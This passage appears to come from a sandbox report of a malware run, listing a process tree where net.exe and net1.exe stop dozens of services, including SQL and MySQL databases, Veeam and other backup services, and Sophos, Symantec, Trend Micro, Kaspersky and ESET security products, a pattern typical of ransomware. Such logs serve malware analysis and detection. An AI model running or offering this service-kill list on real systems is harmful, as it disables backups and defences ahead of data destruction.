  "C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:3368
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:3948
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:3980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:3680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:3460
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:3672
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:4068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:3916
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:3828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPS /y
  2⤵
  PID:3988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:3776
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:3288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:4084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:4080
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:3612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:3436
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:4060
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:3744
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:3560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:4080
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:4072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:3956
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:3700
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:3612
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL80 /y
  2⤵
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:2384
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL57 /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:3388
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ntrtscan /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:3816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop OracleClientCache80 /y
  2⤵
  PID:3628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:3996
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop PDVFSService /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop POP3Svc /y
  2⤵
  PID:3852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:3704
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:3408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:3976
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPS /y
  2⤵
  PID:2376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:3564
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:3676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop RESvc /y
  2⤵
  PID:4048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sacsvr /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:3744
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SamSs /y
  2⤵
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVAdminService /y
  2⤵
  PID:3460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:4084
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVService /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SDRSVC /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:3408
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SepMasterService /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ShMonitor /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:3524
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Smcinst /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:3612
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SmcService /y
  2⤵
  PID:3288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:3884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SMTPSvc /y
  2⤵
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:3436
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SNAC /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SNAC /y
    3⤵
    PID:3264
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SntpService /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:3576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sophossps /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:3952
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:3164
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:3988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:4080
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3264
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:3408
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:3676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:3576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:3800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3584
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:3564
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLBrowser /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:3592
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:3524
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:3628
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:2376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:3724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLWriter /y
  2⤵
  PID:3916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:3672
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SstpSvc /y
  2⤵
  PID:3612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:3564
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop svcGenericHost /y
  2⤵
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:3816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_filter /y
  2⤵
  PID:3576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_service /y
  2⤵
  PID:3388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update_64 /y
  2⤵
  PID:3744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:3680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TmCCSF /y
  2⤵
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:3848
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop tmlisten /y
  2⤵
  PID:4048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:3872
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKey /y
  2⤵
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:3976
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:3724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop UI0Detect /y
  2⤵
  PID:3672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:3612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:4032
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:3408
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:3576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:3560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamMountSvc /y
  2⤵
  PID:3828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:2384
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3540
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop W3Svc /y
  2⤵
  PID:2376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop WRSVC /y
  2⤵
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3372
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:3264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update /y
  2⤵
  PID:3916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:3676
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:3572
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQL Backups" /y
  2⤵
  PID:4068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQL Backups" /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROD /y
  2⤵
  PID:3744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:3164
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
  2⤵
  PID:3776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
    3⤵
    PID:3604
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:3820
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:4072
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop msftesql$PROD /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop NetMsmqActivator /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:3524
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EhttpSrv /y
  2⤵
  PID:3628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:3952
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ekrn /y
  2⤵
  PID:3460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:4068
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ESHASRV /y
  2⤵
  PID:3916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:3828
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:3928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:2384
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AVP /y
  2⤵
  PID:3288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:3816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop klnagent /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:3612
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:3884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:3436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:4060
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:3980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop kavfsslp /y
  2⤵
  PID:3576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFSGT /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFS /y
  2⤵
  PID:3388
